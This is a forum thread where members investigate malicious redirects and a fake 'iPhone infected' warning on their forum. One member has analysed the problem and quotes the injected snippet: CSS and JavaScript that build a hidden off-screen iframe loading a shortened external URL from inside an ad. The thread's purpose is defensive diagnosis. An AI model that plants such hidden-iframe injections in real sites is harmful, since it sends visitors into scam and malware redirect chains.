Damn! Just found the iframe, you beat me to it NF.
Redirect some of the garbage on this forum into a hidden iframe is a great idea.
Redirect some of the garbage on this forum into a hidden iframe is a great idea.
-
bloggoth
If everything isn't black and white, I say, 'Why the hell not?'
John Wayne (My guru, not to be confused with my beloved prophet Jeremy Clarkson) -
Turns out I'd left this tab (in Safari on my MacBook) on the iPhone user agent setting and got sent off on a wild chain of redirects when I tried to look at this thread until I turned off JavaScript (I have a keyboard shortcut set up for that)
Comment
-
CUK triggers malware warning
It’s just got through my Safari, telling me my iPhone is infected and to close the page at my peril.
The feckers.
I’m on the app atm. [emoji35]"I can put any old tat in my sig, put quotes around it and attribute to someone of whom I've heard, to make it sound true."
- Voltaire/Benjamin Franklin/Anne Frank...Comment
-
Flipping mystery. The iframe I found was in the bagsforu stuff, nowt in CUK source. I know Iframes can be hidden from user but surely they'd be shown in source even if dynamically created? All the included stuff looks reputable, Google, dragonbyte, yui, vbulletin etc.bloggoth
If everything isn't black and white, I say, 'Why the hell not?'
John Wayne (My guru, not to be confused with my beloved prophet Jeremy Clarkson)Comment
-
Yes, that's one end point of the redirect chain. Your phone isn't infected at all, but you have to close the tab to get rid of that message as going back will just trigger the redirects again, and if you then come back to the site in a new tab the same thing will probably happenOriginally posted by cojak View Post
Comment
-
You can see it as the last thing in the <body> of the page using your browser's DOM inspector (as you've presumably found) but it isn't in the page source.Originally posted by xoggoth View Post
It's created with JavaScript which is hidden (along with the CSS that hides the iframe) in the HTML for the the skyscraper ad on the right; that HTML is itself embedded in JSON that's loaded asynchronously. The offending code is just:
If you follow that goo.gl URL, it takes you to the bags site, and all subsequent badness comes from garbage that is itself embedded in there.Code:<style> #ifr_ads_banners{ width:1600px;height:800px;position:absolute;left:-9985px; } </style> <script> (function(d,e,g){ g=d.createElement(e); g.src='//goo.gl/Cp8ciT'; g.id='ifr_ads_banners'; d.body.appendChild(g); })(document,'iframe'); </script>
The problem is finding out where in the ad server this code is being inserted into the response. It's not in the database, but from looking at the source for the ad server (which is available on GitHub), I can immediately see two or three different ways to insert some code into the response chain if there's a vulnerability that allows one to drop a file or two on the server. And that's by using the legitimate plugin system that's an integral part of the way the ad server operates, so it's not something that can be easily disabled.Comment
-
A couple of useful suggestions there at New Ad prevents site from loading on mobile - Page 3 but as I recall admin checked the prepend/append stuff and there wasn't anything there.Originally posted by xoggoth View PostComment
-
Comment